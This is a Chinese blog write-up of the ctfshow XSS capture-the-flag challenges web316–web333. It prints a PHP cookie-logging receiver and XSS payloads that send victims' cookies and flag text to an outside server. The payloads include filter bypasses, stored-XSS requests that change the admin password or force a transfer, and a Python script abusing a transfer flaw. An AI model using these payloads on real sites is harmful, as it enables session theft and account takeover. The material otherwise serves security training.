ctfshow XSS web316~web333

最新推荐文章于 2024-04-14 18:19:01 发布
最新推荐文章于 2024-04-14 18:19:01 发布
阅读量1.7k 收藏 3
点赞数 2
分类专栏: ctfshow_web入门 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/128007318
版权

web316

反射性 XSS

题目提示我们要以 admin 获取
在这里插入图片描述
奇葩的是用网上的 xss 平台,获取的 cookie 全是自己的。

可以在自己的服务器上,创建一个接收 cookie 的 PHP 文件:

<?php
$cookie = $_GET['cookie'];
$time = date('Y-m-d h:i:s', time());
$log = fopen("cookie.txt", "a");
fwrite($log,$time.':    '. $cookie . "\n");
fclose($log);
?>

构造 xss 语句:

<script>location.href="http://ip/x.php?cookie="+document.cookie</script>

在这里插入图片描述

web317

过滤了 script,标签可以用 img 标签。

<img src="" onerror=location.href="http://ip/x.php?cookie="+document.cookie>

在这里插入图片描述

web318-319

img 标签也被过滤了,可以用 body 标签。

<body onload=location.href="http://ip/x.php?cookie="+document.cookie>

在这里插入图片描述

web320-326(反射型)

上面的 payload 用不了,测试一番发现过滤了空格,可以用 / 绕过。

<body/onload=location.href="http://ip/x.php?cookie="+document.cookie>

在这里插入图片描述

web327(存储型xss)

收件人 admin

<body/onload=location.href="http://ip/x.php?cookie="+document.cookie>

在这里插入图片描述

web328

在用户管理处显示要 admin 权限,且显示会显示所有的用户名密码,说明它会存储在某个地方,那么这个存的用户名和密码处会不会产生 xss 呢?

答案是会产生 xss
上面的那个 body 标签没用了,我们可以使用 <script> 标签。

<script>location.href='http://ip/x.php?cookie='+document.cookie</script>

更改phpsessid 访问用户管理的时候,会跳转,我们可以抓包查看。
在这里插入图片描述
在这里插入图片描述

web329

继续用上面的payload 获得了 admin 的 cookie,但是访问的时候却还显示不是 admin,并且 cookie 会变化,也就是说这个 cookie 在使用后就没用了。
在这里插入图片描述
看了 bilibili 里的视频后,学到一种姿势,因为它会把我们的 xss 代码即使是在用户管理里也会执行,所以我们可以这届把 flag 发送到我们的服务器里。

<script>
$('.laytable-cell-1-0-1').each(function(index,value){
	if(value.innerText.indexOf('ctfshow{')>-1)
	{location.href='http://ip/x.php?cookie='+value.innerText}
});
</script>

payload:

<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerText.indexOf('ctfshow{')>-1){location.href='http://ip/x.php?cookie='+value.innerText}});</script>

在这里插入图片描述

web330

有修改密码的地方,那我们不就可以直接修改 admin 的密码了吗。

路径也知道了。
在这里插入图片描述
payload:

<script>location.href="http://127.0.0.1/api/change.php?p=12345678"</script>

最后登录抓包得到 flag

在这里插入图片描述

web331

和上一题不同的是,这次的是 post 请求,用 ajax 异步请求。

<script>$.ajax({url:'api/change.php',type:'post',data:{p:'111'}});</script>

在这里插入图片描述
最后注册,登录 admin 拿到 flag
在这里插入图片描述

web332

经测试自己转账给自己,余额不降反升,那么写个脚本跑一下呗。

import requests
url = 'http://ef46a706-80af-4a5c-8168-42d0aa88b161.challenge.ctf.show/api/amount.php'
money = 4
for i in range(100):
    data = {
        'u':'111',
        'a':money
    }
    money += 4
    cookie = {
        'PHPSESSID':'p8fk0f6lht46n8h5n96u5m7fjs'
    }
    req = requests.post(url,data=data,cookies=cookie)
    print(req.text)

在这里插入图片描述

web333

同上
在这里插入图片描述
预期解释通过 ajax 异步提交 post 数据,让 admin 转账给我们。

具体步骤是,先注册一个收款人用户,再注册一个 xss 用户,之后等会,admin 就转完了。

<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'111',a:'10000'}});</script>
succ3
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全测试之XSS实例讲解
09-01
本文主要介绍Web安全测试之XSS,这里详细整理了测试XSS的资料,并附示例代码和详细讲解,有需要的小伙伴可以参考下
Web应用进行XSS漏洞测试
03-03
WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常包含...
ctfshow-xss
Vincent0sen的博客
09-13 265
ctfshow刷题记录
解决使用v-html 转译富文本数据,标签还在的问题
hu104160112的博客
02-27 853
按理说使用v-html转译富文本数据,html标签就没了,但有时候还是有 方法一 HTMLDecode(text) { var temp = document.createElement("div"); temp.innerHTML = text; var output = temp.innerText || temp.textContent; temp = null; return output; }, 方法二
CTFShow Web 入门 XSS
最新发布
tj13995958709的博客
04-14 680
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
Web】Ctfshow XSS刷题记录
uuzeray的博客
11-22 555
如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码,从而获得admin的payload。密码在layui-table-cell laytable-cell-1-0-1类中,可以用getElementsByClassName来获取。这里的是管理员在点击过js后立马登出,它的cookie一直是无效的,我们这里获取的话可以去获取它的用户名和密码。用admin admin登录即可。
网安之web安全第三十八天
B_l_a_nk的博客
04-06 138
1、XSS跨站-过滤绕过-便签&语句&符号等 2、XSS跨站-修复方案-CSP&函数&http_only等
Ctfshow web入门 XSSweb316-web333 详细题解 全
Jay17的博客
09-28 3775
Ctfshow web入门 XSSweb316-web333 详细题解 全
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 1369
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1742
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 4160
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 655
2023/05/07 ctfshow刷题 web316-326 反射型XSS
ctfshow XSS web316-web333 wp
mumuzi的博客
02-05 4389
可能写的有点啰嗦,记录自己做题的过程 文章目录web316web317web318web319web320web321web322web323web324web325web326web327web328web329web330web331web332web333 web316 后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。 这里有两种方法来获取,一种是在线的xss平台,如https:/
Web安全性测试之XSS
01-31
全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
CTFshow XSS(web316-333)
Kradress的博客
03-18 652
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
ctfshow-web-xss
qq_60905276的博客
01-22 499
1.web316 直接简单的测试一下 <script>alert("hack")</script> 发现并没有防护,直接开整。 (做xss-labs-master魔怔了,愣是不知道flag在哪,看别人才知道flag在cookie那里) 好,我们开个项目直接做。 轻松解决。 网站在下面XSS Platformhttp://xsscom.com/ 2.web317 又是一波测试,发现它把<script>标签过滤了。 那我们就用svg的,..
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1697
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
web332,333
pandasaymmm的博客
02-18 57
web332,爬虫
xss filter
09-08
XSS (Cross-Site Scripting) 是一种常见的安全漏洞,攻击通过注入恶意脚本来攻击网站用户。为了防止XSS攻击,可以使用XSS过滤器来对用户输入的数据进行处理和过滤。 XSS过滤器的主要目标是检测和阻止恶意脚本的注入。它可以通过以下几种方式来实现: 1. 输入验证: 对用户输入的数据进行验证,确保只接受符合预期格式和类型的数据。例如,如果一个输入字段只允许数字,那么任何非数字的输入都应该被拒绝。 2. 输出转义: 对从数据库或其他来源检索到的数据进行适当的转义处理,确保在将其插入到HTML页面时不会被解释为可执行的脚本代码。常见的转义包括将特殊字符如<、>、&等替换为对应的HTML实体编码。 3. 内容安全策略(CSP): 使用CSP可以限制页面中可以加载和执行的资源,从而减少XSS攻击的可能性。CSP可以配置允许加载的外部脚本、样式表和图片等资源,同时禁止内联脚本和eval()等危险函数的使用。 4. HttpOnly Cookie: 将敏感信息存储在HttpOnly Cookie中,这样可以防止客户端的脚本访问和修改Cookie内容,减少XSS攻击的影响范围。 5. 使用安全的编程语言和框架: 选择使用经过安全性测试的编程语言和框架,它们通常提供了内置的安全机制和过滤器,帮助减少XSS攻击的风险。 综合上述措施可以加强网站的安全性,但是XSS攻击的方法和技术不断演变,所以保持对最新安全威胁的了解和及时更新防护措施也是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值